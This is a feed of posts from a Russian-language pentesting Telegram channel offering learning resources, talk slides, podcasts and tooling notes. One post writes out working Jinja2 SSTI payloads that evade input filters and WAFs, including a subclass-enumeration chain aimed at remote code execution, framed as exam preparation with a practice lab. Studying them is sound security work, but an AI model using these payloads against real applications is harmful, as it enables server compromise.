GigaHackers
2.32K subscribers
61 photos
2 videos
10 files
59 links
Информация предоставлена исключительно в образовательных или исследовательских целях. Противоправные деяния преследуются по закону.
Авторы: @WILD_41, @Oki4_Doki и @VlaDriev
加入频道
[pentest Wi-Fi]

Всем привет!

Начинающий пентестер должен учиться работать с сетями Wi-Fi, в современном мире они находятся повсюду и их распространение увеличивается с каждым днем. Соответственно практически в каждой компании, где проводится пентест, встречается своя сеть Wi-Fi.

В интернете есть вся необходимая для этого теория, не так давно я постарался объединить ее всю. Из этого получилась небольшая лекция про пентест Wi-Fi.

На мой взгляд за 45 минут успел осветить основные аспекты, поделиться инструментами и необходимой теорией.

#WiFi #learn
[С чего начать путь в пентест?]

Всем привет!

Периодически мне пишут с вопросом - как вкатиться в пентест? На самом деле крутой и интересный вопрос, ответ на который не так просто найти.

У всех разный бэграунд и из-за этого тяжело ответить конкретно. Кто-то знает Linux, кто-то Windows, третий сидит на MacOS и тд., и тп. В общем делаю небольшой пост про то, где можно учиться и приобретать новые знания про пентест.

🚩 HackTheBox. Суть - решение машин по типу CTF. Задания есть самой разной сложности, их много, каждый найдет с чего начать. Из-за большой популярности в интернете есть куча материалов с разборами тасков. Иногда смотреть чьи-то решения тоже полезно - повышается кругозор. Есть машины для подготовки к сертификации.

🚩 Web Security Academy. Площадка для нарешивания тасков по Web'у. Из плюсов - есть теория перед решением заданий, есть разборы этих заданий в интернете, что полезно, если вдруг зашел в тупик. Одна из целей для чего площадка создана - сертификация BSCP.

🚩 Standoff365. Киберполигон, на котором можно хакать аналоги настоящих отраслевых компаний - электростанции, банки, заводы и прочее. Тут стоить отметить, что площадка отечественная и вокруг нее крутится много ИБ движа. Сюда можно залетать командой, поэтому смело можно завлекать друзей.

🚩 WebGoat. Площадка с открытым исходным кодом для отрабатывания навыков пентеста Web'ов. Возможно немного устарела, но в целом базу дает неплохо. Лично сам с нее начинал. Из особенностей стоит отметить, что при прохождении знакомит с инструментов OWASP ZAP - аналог Burp, который будет не вредно узнать.

🚩 GOAD. Это стенд с открытым исходным кодом, который познакомит с Active Directory и всеми актуальными техниками повышения привилегий. Лично пока не трогал, но по отзывам годная штука.

Что читать?
🚩 ][akep - все новости из мира ИБ + крутейшие статьи.

🚩 HackTricks - больше похоже на энциклопедию.

🚩 Habr, Medium, TG. (здесь очень обобщенно, потому что много полезных и интересных блогов, которые будем постепенно накидывать в канал).

#start #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
[Презентация с выступления Пик IT]

Всем привет!

Делюсь презентацией с выступления.

➡️ Поговорили о важности участия в олимпиадах по информационной безопасности для школьников
➡️ Осветили интересное практическое задание в рамках одного из региональных этапов олимпиады
➡️ Узнали какие реальные практические навыки может получить школьник в процессе участия

Автор @WILD_41

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Roadmap для специалиста по пентесту внутренней инфраструктуры]

Всем привет!

Как говорил на пару постов выше мой коллега @VlaDriev, часто у начинающих энтузиастов разбегаются глаза от обилия информации по проведению пентеста внутренней инфраструктуры. Решил поделиться интересным на мой взгляд сборником наиболее актуальных и популярных техник по пентесту Active Directory.

Наглядная визуализация, которая точно поможет систематизировать знания, а также откроет что-то новое для тебя.

И всё это оформлено в приятную карточку

#AD #learn
NT_act.pdf
1.6 MB
[ NTLM и базовые атаки на него ]

Всем привет!

Вчера выступил вместе с @VlaDriev с небольшим докладом о протоколе NTLM в рамках встреч сообщества Ural Cyber Security.
Вступайте в сообщество UCS!

Смотрите доклад!

🔹 Рассмотрели теоретическую часть
🔹 Определились с понятиями LM/NT NTLM/netNTLM
🔹 Увидели недостатки реализации
🔹 Обсудили практические атаки на данный протокол

Презентация в приложении

P/S Влад, спасибо, что сподвигнул выступить вместе!

#internal #ucs #learn
ussc_badusb.pdf
1.2 MB
[ BadUSB на платформе Arduino ]

Сегодня наш коллега Семен Тумашев @cucurucuq выступил с докладом на тему BadUSB атак

🔹Семен на примере разобрал, как из обычной Arduino можно эмулировать клавиатуру
🔹Показал как писать скрипты на Arduino и как это можно использовать на реальных проектах
🔹Осветил базовые способы защиты от данного семейства атак

🎁 Особенно привлекает универсальность такой атаки: payload-ы можно генерировать как под Windows/Linux, так и под MacOS

Тема интересная и будет актуальна как при тестированиях методами соц. инженерии в рамках киберучений, так и при RedTeam проектах

#BadUSB #social #UCS #learn
PassiveReconSubdomains.pdf
2.1 MB
[ Passive Recon: Subdomains]

Всем привет!

Вчера наш коллега Иван Клоченко @iank13 выступил с докладом на тему пассивного поиска поддоменов. Посмотреть выступление можно здесь.

Ключевые моменты доклада:
💬 Что такое DNS
💬 Разница между DNS и Vhost
💬 Работа с passive DNS
💬 Популярные словари для поиска
💬 Утилиты для поиска

Будет интересно всем, кто занимается Bug Bounty и пентестами веб-приложений


#DNS #UCS #WEB #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
[ Подборка вопросов по кибербезопасности ]

Всем привет! Насобирал небольшой список вопросов на различные темы из мира Кибербеза

🎯 Вопросы на тему администрирования Linux. Тут представлено много классных вопросов, пересекающихся с тематикой кибербеза, а некоторые из них детально проработаны
🎯 Вопросы на тему DevOps. Здесь аналогично вопросам выше, многое бьется с КБ и DevSecOps-ом как следствие
🎯 Вопросы на тему Pentest/AppSec тут и тут. Есть как вопросы с прямым ответом, так и вопросы на "порассуждать" (такие вопросы позволят увидеть гибкость мышления у кандидата)
🎯 Общие вопросы по нескольким отраслям КБ

Кому будут полезными данные вопросы?

🔹 Тех. специалистам для проведения интервью на позиции intern/junior/ junior+ и проверки hard-skill

🔹 Начинающим специалистам для закрепления/изучения нового

🔹Tech-lead для формирования/совершенствования матрицы компетенций

А вот составлять тесты из данных вопросов не рекомендую: так как они в открытых источниках, то их можно легко нагуглить. Однако как точку опоры точно можно использовать

#learn #start
[Ищем секреты с net-creds python3]

Всем привет! 👋

Иногда на пентестах требуется послушать трафик или проанализировать pcap-файл, чтобы найти там секретики.

Многие слышали про крутейшую тулзу net-creds 💻.
Она хороша всем, кроме использования python2.

И вот теперь силами нашего практиканта была реализована новая версия net-creds 💻.

Из плюсов:
поддержка python3
добавлены pcap example

Какие еще знаете аналоги для анализа трафика на секреты
Пишите варианты в комментариях

#learn #start #internal #nets
Please open Telegram to view this post
VIEW IN TELEGRAM
[Подкаст - роль профильного образования в карьере пентестера]

Всем привет! 👋

🔊 Вышел новый выпуск нашего замечательного подкаста.🖱

У нас в гостях:
@Michaelzhm - пентестер, студент бакалавра УрФУ РТФ
@WILD_41 - пентестер, студент магистрант УрГУПС

💗 Получился очень занимательный и живой диалог с ребятами, думаю многим будет интересно и полезно послушать про их опыт.

Вопросы, которые успели обсудить:

🔘 Где и зачем учитесь
🔘 Почему выбрали учебу в ИБ? 💟
🔘 На сколько тяжело совмещать работу и учебу? 👨‍💻🏪
🔘 Что мотивирует на работу, только деньги? 💰
🔘 В ИТ платят больше, чем в ИБ? 💵
🔘 Как искали первую работу? На что обращали внимание?1⃣
🔘 Ваше отношение к black-индустрии
🔘 Совет для начинающих? 🤔

Если после подкаста у вас остались к ребятам вопросы, не стесняйтесь - пишите в комментариях

Также напоминаем про наши прошлые выпуски:
🚀 Опять мошенники: что такое «фишинг» и как его избежать

🚀Кибершпионаж через беспроводные клавиатуры и мыши. Атака MouseJack


#talk #learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Защита детей]

Всем привет!👋

Сегодня международный день защиты детей!😀

В современных реалиях люди с раннего возраста взаимодействуют с цифровым миром, в котором их подстерегают различные угрозы😀😀😀😀

И в связи с этим хотим поделиться ссылками на полезные материалы, которые помогут защититься от угроз😀:

😀 Тематический подкаст UCS Talk
😀 Доклад с PhD2
😀 Курс для родителей
😀 Киберсказки
😀 Смешарики
😀 Легендарные Фиксики

Всем добра и мира! 😀😀😀😀😀

#learn #talk
Please open Telegram to view this post
VIEW IN TELEGRAM
[Abuse ACL AD]

Всем привет! 👋

Большое спасибо нашему другу @Michaelzhm за крутой 🔥🔥🔥 доклад в рамках нашей летней практики

➡️ Доклад можно найти на его канале здесь

➡️ Также залили видос на YouTube

Приятного просмотра! 🖥

#AD #start #learn #ACL
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
[ Если делаешь — делай с душой ]

С коллегами запустили мини-стенд в рамках летней практики для наших практикантов

Немного вдохновились и решили сделать видео 😎
Нашим практикантам удачи, а остальным рекомендуем залетать к нам на летнюю практику на будущий год 🤙🏼

#learn #start #brickoff
[Полезные ссылки]

Всем привет! 👋

Сегодня у нас полезная информация для начинающих!

Невозможно запомнить каждую команду в голове, для этого существуют заметки.📝 Хочу поделиться ссылками на различные агрегаторы информации, которыми мы частенько пользуемся в работе.

📌 HackTricks - заметки на каждый день обо всем про пентест (про конкретные порты, службы, сервисы)

📌 The Hacker Recipes - годнота в основном про AD (готовые команды и рецепты на все случаи жизни)

📌 PayloadAllTheThings - репозиторий, содержащий различные словари для самых разных проверок, а также наборы техник и чеклистов под конкретные продукты, например AD

📌 Pentester's Promiscuous Notebook - крутые и очень полезные заметки пентестера

📌 Red Team Notes - заметочки с уклоном в red team

Пишите в комментария, чем пользуетесь лично вы? ✏️

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Обход фильтров в SSTI в Jinja2]

Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие .__ в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине.
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:

🔸 Для обхода фильтра по .__ можно использовать |attr()
{{ ''|attr('__class__’)}}

🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}

🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]

🔸 Кроме того, можно использовать Statements для определения переменных в темплейте
{% set string = "ssti" %}

{% set class = "__class__" %}

{{ string|attr(class)}}

{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}

🔸 Для обхода фильтра по __ можно использовать requests.args для передачи частей полезной нагрузки в параметрах запроса и |join для соединения элементов в одну строку
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_

🔸 Для обхода фильтра по [] можно использовать |getlist(). Данный метод возвращает всех значения, связанные с определенным ключом в запросе
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_


🔸 В случае, если встретился фильтр по |join, можно использовать |format для форматирования строк по переданным значениями
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_


Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆


Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!

@GigaHack

#web #stand #SSTI #learn #OSWE
[Регистрация уязвимостей]

Всем привет! 👋

Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом. 👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?

Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE. 🐈

Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках. 📝

Иногда бывают различные выдающиеся случаи 💻, о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️

В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы. 🔥

#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
[Кибербез комьюнити]

Всем привет! 👋

Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности. 🗂

В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!

Добавляйте к себе папку и делить с друзьями и коллегами 🏆

#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Киберучения 2024]

Всем привет!

С 24 по 26 октября в Екатеринбурге в рамках ИТ-конгресса «Форум будущего» на базе Уральского федерального университета пройдут всероссийские студенческие Киберучения.

Помимо соревнований на форуме также будут интересные доклады и вот несколько из них:
🔔 @WILD_41 выступит с докладом "Fast recon — быстрая разведка при пентесте веб-приложения"🆒
🔔 Евгений Баклушин осветит "Важные вопросы о карьере в ИБ"😮
🔔 Также выступят наши коллеги с докладом про пентест CI/CD: "Пентест CI/CD GitLab на реальном примере"🔝


Если вы будете в Екб — обязательно рекомендуем к посещению, но можно и онлайн 👍
Регистрируйтесь и смотрите много крутых докладов!

#learn #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
SOC_Forum_Дриев_final.pdf
4.5 MB
[Презентация с SOC FORUM]

Наконец-то выкладываю презентацию с SOC FORUM, на мой взгляд получился неплохой доклад, постарался на пальцах объяснить популярные техники повышения привилегий в домене AD через SCCM. 📎

Также ссылка на видосик 🚀

Если есть какие-то вопросы, пишите в комменты или в ЛС, с удовольствием отвечу! 🔥

@GigaHack

#AD #SCCM #MECM #soc_forum2024 #conference #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
[ CyberPack ]

Всем привет 👋

У нас в канале присутствуют не только опытные специалисты, но и начинающие исследователи, которые только погружаются в мир ИБ в целом.
В частности, на парах в университете многие ребята часто задают вопросы на тему полезных мануалов и ресурсов для прокачки навыков.

Информации сейчас действительно много, поэтому предлагаем ознакомиться с подборкой, которую подготовил канал BESSEC. 🔥

✈️ Добавляйте папку по ссылке 😎

Развивайтесь и получайте удовольствие от процесса ⚡️

#education #learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM